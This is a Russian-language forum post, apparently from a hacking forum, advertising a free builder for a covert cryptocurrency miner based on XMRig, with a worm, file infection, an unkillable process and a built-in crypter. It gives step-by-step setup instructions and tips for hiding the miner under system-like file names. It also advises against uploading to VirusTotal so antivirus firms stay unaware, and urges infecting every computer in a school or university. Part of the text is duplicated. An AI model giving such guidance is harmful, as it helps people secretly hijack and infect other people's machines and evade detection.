Начнем с функционала:
Если встроенный криптор начал палиться - убирайте чекбоксы "К" и криптуйте сами, благо тем в интернете куча.
ВАЖНО!!! Не лейте ничего на VT, а то и недели не проживет. Есть сайт nodistribute, он не посылает отчеты антивирусным компаниям. Проверяйте все файлы на нем.
P.S. Да, билдер бесплатный и все такое, но мне будет идти от 15 до 25% мощности. Хорошо или плохо - решать вам, но, думаю, лучше дать немного мощности, чем отдавать кучу денег за приват майнеры. Спасибо большое всем, кто дочитал до конца и воспользовался данным софтом, для Вас отдельное место в... раю? А я уже завтра уезжаю служить. Очень хочу продолжать работу над этим проектом, но увы, обновления будут минимум через полтора года
Ну и лайфхак такой. Делаете билд с червем и заражаете все ПК в школе - ВУЗе - шараге. Профит будет хороший.
Ссылки:
Билдер -
Архив с билдером -
Получившийся билд -
- Регулируемая нагрузка на процессор
- Вывод сообщения при первом запуске
- Настраиваемые процессы
- Неубиваемый процесс майнера
- Маленький размер билда
- Возможность заражения файлов
- Интервал старта майнинга
- Автозагрузка майнера
- Постоянная проверка файлов
- Встроенный криптор .Net
- Гибкая настройка
- Для запуска необходим fraimwork 2.0, а если пользовались моим криптором, то 3.5.
- Криптованные файлы весят не так уж и мало.
- Необходимо криптовать XMRig.
- Трое суток под фенотропилом, возможно я что-то пропустил, так что тестируйте.
- Для начала, необходимо закриптовать XMRig. Но так, чтобы в него можно было впихивать потом параметры. Криптуйте сами, либо покупайте крипт где-нибудь.
- Загружаем наш XMRig на любой файлообменник, облако, ftp и тд.
- Берем прямую ссылку и вставляем в самое первое текстовое поле билдера.
- Следующим шагом указываем имена процессов, при которых майнинг будет останавливаться.
- В поле "Название майнера" пишем имя файла, но без расширения (то есть пишем "program", а не "program.exe"). Придумывайте имена файлов более похожие на стандартные системные файлы, так будет меньше подозрений, если нас увидят в ДЗ.
- Процент нагрузки указываем от 15 до 75.
- Адрес пула берем на minergate, либо указывайте любой другой пул.
- Логин с minergate пишем в поле "Логин" (как бы это странно не было).
- В следующем поле указываем интервал таймера, по которому наш майнер будет запускаться. (От 1 до 600, вроде).
- "Директория загрузчика". Тут обязательно в конце пути пишем слэш "\".
- В поле "Имя загрузчика" наоборот необходимо указать расширение файла. (Обязательно, либо ничего не будет работать).
- Заполняем имя чекера, контроллера и, если необходимо, червя. (Также, как в 5 пункте, без расширения).
- Чекбокс "К" - криптовать файл, "Н" - неубиваемый процесс.
- Нажимаем кнопку "Собрать". Ждем около 10-15 секунд и загружаем наши 2-3 файла, опять же, на файлообменник и берем прямые ссылки на них.
- Нажимаем другую кнопку "Собрать" и наш билд готов.
Если встроенный криптор начал палиться - убирайте чекбоксы "К" и криптуйте сами, благо тем в интернете куча.
ВАЖНО!!! Не лейте ничего на VT, а то и недели не проживет. Есть сайт nodistribute, он не посылает отчеты антивирусным компаниям. Проверяйте все файлы на нем.
P.S. Да, билдер бесплатный и все такое, но мне будет идти от 15 до 25% мощности. Хорошо или плохо - решать вам, но, думаю, лучше дать немного мощности, чем отдавать кучу денег за приват майнеры. Спасибо большое всем, кто дочитал до конца и воспользовался данным софтом, для Вас отдельное место в... раю? А я уже завтра уезжаю служить. Очень хочу продолжать работу над этим проектом, но увы, обновления будут минимум через полтора года
Ну и лайфхак такой. Делаете билд с червем и заражаете все ПК в школе - ВУЗе - шараге. Профит будет хороший.
Ссылки:
Билдер -
Пожалуйста,
Вход
или
Архив с билдером -
Пожалуйста,
Вход
или
Получившийся билд -
Пожалуйста,
Вход